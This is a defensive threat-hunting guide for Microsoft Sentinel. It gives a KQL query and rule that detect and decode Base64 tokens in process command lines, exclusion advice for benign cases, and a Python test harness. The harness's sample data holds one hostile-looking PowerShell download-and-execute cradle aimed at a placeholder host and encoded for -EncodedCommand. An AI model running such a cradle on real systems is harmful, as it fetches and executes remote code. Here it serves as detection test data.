Adversaries Base64-encode command-line arguments, most commonly a script handed to PowerShell's -EncodedCommand (-enc) parameter, so that the real command never appears in plain text and simple string matching on ProcessCommandLine misses it. SOC teams should proactively hunt for long Base64-looking tokens in process command lines, decode them inside the query, and triage the decoded content to surface obfuscated payloads and early-stage compromise in their Microsoft Sentinel (formerly Azure Sentinel) environment. Two caveats for triage: PowerShell encodes the script as UTF-16LE, so expect null characters between the letters in the decoded column, and the Base64 alphabet also covers long hex digests and similar tokens, so not every match is a real payload.
KQL Query
```kusto
DeviceProcessEvents
| where isnotempty(ProcessCommandLine)
| extend SplitLaunchString = split(ProcessCommandLine, " ")
| mv-expand SplitLaunchString                      // current spelling of the legacy mvexpand operator
| extend Base64 = tostring(SplitLaunchString)      // matches regex needs a string, not a dynamic element
| where Base64 matches regex @"^[A-Za-z0-9+/]{50,}={0,2}$"
| extend DecodedString = base64_decode_tostring(Base64)   // replaces the deprecated base64_decodestring()
| where isnotempty(DecodedString)                  // invalid Base64 decodes to empty and is dropped here
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine, Base64, DecodedString
```
```yaml
id: 89fc1421-8387-4c2b-9bcb-75ead57ccb2c
name: Base64 Detector and Decoder
description: |
  This query identifies whitespace-delimited tokens in process command lines that match the Base64 encoding format, extracts each one into a column called Base64, and decodes it into a column called DecodedString.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
  - DefenseEvasion
relevantTechniques:
  - T1027
  - T1059
query: |
  DeviceProcessEvents
  | where isnotempty(ProcessCommandLine)
  | extend SplitLaunchString = split(ProcessCommandLine, " ")
  | mv-expand SplitLaunchString
  | extend Base64 = tostring(SplitLaunchString)
  | where Base64 matches regex @"^[A-Za-z0-9+/]{50,}={0,2}$"
  | extend DecodedString = base64_decode_tostring(Base64)
  | where isnotempty(DecodedString)
  | project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine, Base64, DecodedString
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure the Microsoft Defender XDR (MicrosoftThreatProtection) data connector is enabled and streaming this table |
Scenario: A system administrator encodes a password or other secret with base64 and decodes it inside a scheduled job.
Filter/Exclusion: Exclude on the scheduler as the parent (InitiatingProcessFileName of cron/crond, atd, or systemd for timer units) together with the known script path, after confirming DecodedString is the expected configuration value. Do not key on `--encode` or `--decode` flags: GNU base64 only has `-d`/`--decode`, and there is no `--encode` flag for an exclusion to match.
Scenario: A developer's CI/CD pipeline decodes binary data (e.g., an image or certificate) that is stored as a Base64 secret variable.
Filter/Exclusion: Exclude on the runner process as the parent (the Jenkins agent, gitlab-runner, or the GitHub Actions runner) and on the pipeline's workspace path. Flags such as `--binary` are not a reliable key, since the tools involved do not share a flag set.
Scenario: A network or security tool is handed packet data in Base64 form for analysis.
Filter/Exclusion: Wireshark and tcpdump write captures to files and stdout, not to command-line arguments, so a match here comes from a wrapper or conversion script that passes the blob as an argument. Exclude on that script's FileName and its parent, not on tcpdump or Wireshark flags, and confirm DecodedString is packet bytes rather than a readable script.
Scenario: A database administrator Base64-encodes a dump file for backup.
Filter/Exclusion: mysqldump, pg_dump, and sqlcmd do not Base64-encode their output and have no `--base64` flag; the encoding comes from a separate `base64` step in the backup script. Exclude on the backup script or backup agent as the parent of that `base64` process.
Scenario: A package manager or patching tool (e.g., yum, apt, or Chocolatey) appears with a Base64 token on its command line, such as a key or token passed in by an orchestration script.
Filter/Exclusion: Exclude on the package manager's FileName combined with a trusted InitiatingProcessFileName (the configuration-management or patching agent). Flags like `--download`, `--install`, or `--patch` are not a usable key, since these tools do not share them.
In every case, key the exclusion on FileName, InitiatingProcessFileName, FolderPath, or the content of DecodedString, and never suppress powershell.exe or pwsh.exe invocations carrying -EncodedCommand/-enc wholesale: that is the most common adversary use of Base64 on a command line and the case this hunt exists to catch.
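The following Python is an added example, not part of the original query pack or of Microsoft Sentinel: it reproduces the query's tokenise, match and decode logic over a few constructed DeviceProcessEvents rows and applies the parent/child allow-listing the scenarios above recommend, so both the hunt and its tuning can be exercised offline. Everything in it is assumed for illustration: the sample rows, the ALLOWLIST pairs, the UTF-16LE detection for PowerShell -EncodedCommand payloads, and the stricter "decoded text must be printable" rule, which the KQL (with only isnotempty) does not apply.

```python
import base64
import binascii
import re

# Same token shape the KQL query looks for: 50+ Base64-alphabet characters, then 0-2 '=' pads.
BASE64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{50,}={0,2}$")

# Hypothetical allow-list of (InitiatingProcessFileName, FileName) pairs taken from the
# benign scenarios above. Tune it to your own estate; never put powershell.exe here.
ALLOWLIST = {
    ("cron", "base64"),           # scheduled job decoding a stored secret
    ("gitlab-runner", "base64"),  # CI job materialising a certificate from a secret variable
}


def decode_token(token):
    """Decode one Base64 token to text; return (text, encoding) or None.

    The KQL query keeps any row where base64_decode_tostring() is non-empty. This
    example is deliberately stricter (our assumption, not the query's behaviour):
    the bytes must be UTF-16LE (what PowerShell -EncodedCommand produces) or UTF-8,
    and the result must be printable, so hex digests and other tokens that merely
    use the Base64 alphabet do not surface as findings.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None  # wrong length or padding: not Base64 despite the alphabet match
    # ASCII text encoded as UTF-16LE has a zero byte in every odd position.
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        text, encoding = raw.decode("utf-16-le"), "utf-16-le"
    else:
        try:
            text, encoding = raw.decode("utf-8"), "utf-8"
        except UnicodeDecodeError:
            return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text, encoding


def hunt(events, allowlist=ALLOWLIST):
    """Reproduce the query over in-memory rows: split ProcessCommandLine on spaces,
    keep tokens matching BASE64_TOKEN, decode them, and tag the ones the allow-list
    explains instead of dropping them, so the tuning stays auditable."""
    findings = []
    for ev in events:
        for token in ev["ProcessCommandLine"].split(" "):
            if not BASE64_TOKEN.match(token):
                continue
            decoded = decode_token(token)
            if decoded is None:
                continue
            text, encoding = decoded
            findings.append({
                "DeviceName": ev["DeviceName"],
                "InitiatingProcessFileName": ev["InitiatingProcessFileName"],
                "FileName": ev["FileName"],
                "Base64": token,
                "DecodedString": text,
                "Encoding": encoding,
                "Suppressed": (ev["InitiatingProcessFileName"], ev["FileName"]) in allowlist,
            })
    return findings


# Constructed sample rows (not real telemetry) carrying the DeviceProcessEvents columns used here.
PS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SECRET = "db_password=" + "x" * 40
CERT = "-----BEGIN CERTIFICATE-----\nMIIB" + "A" * 40 + "\n-----END CERTIFICATE-----\n"
HEX_DIGEST = "3f2a" * 16  # 64 hex chars: inside the Base64 alphabet, but not Base64 text

SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "InitiatingProcessFileName": "winword.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -enc "
                           + base64.b64encode(PS_SCRIPT.encode("utf-16-le")).decode("ascii")},
    {"DeviceName": "srv01", "InitiatingProcessFileName": "cron", "FileName": "base64",
     "ProcessCommandLine": "base64 -d " + base64.b64encode(SECRET.encode()).decode("ascii")},
    {"DeviceName": "ci01", "InitiatingProcessFileName": "gitlab-runner", "FileName": "base64",
     "ProcessCommandLine": "base64 -d " + base64.b64encode(CERT.encode()).decode("ascii")},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "cmd.exe", "FileName": "certutil.exe",
     "ProcessCommandLine": "certutil -hashfile C:\\tools\\agent.exe SHA256 " + HEX_DIGEST},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "services.exe", "FileName": "svchost.exe",
     "ProcessCommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        flag = "allow-listed" if f["Suppressed"] else "REVIEW"
        print(f"{flag:12} {f['DeviceName']} {f['InitiatingProcessFileName']} -> {f['FileName']} "
              f"[{f['Encoding']}] {f['DecodedString'][:60]!r}")
```

Run stand-alone it prints one line per finding: the winword.exe to powershell.exe row decodes as UTF-16LE and is the one an analyst reviews, the two `base64 -d` rows are tagged as allow-listed by their parent/child pair rather than by any flag, and the certutil digest never surfaces because its bytes are not text. Keeping suppressed findings in the output rather than filtering them out makes it easy to see what each exclusion is actually hiding.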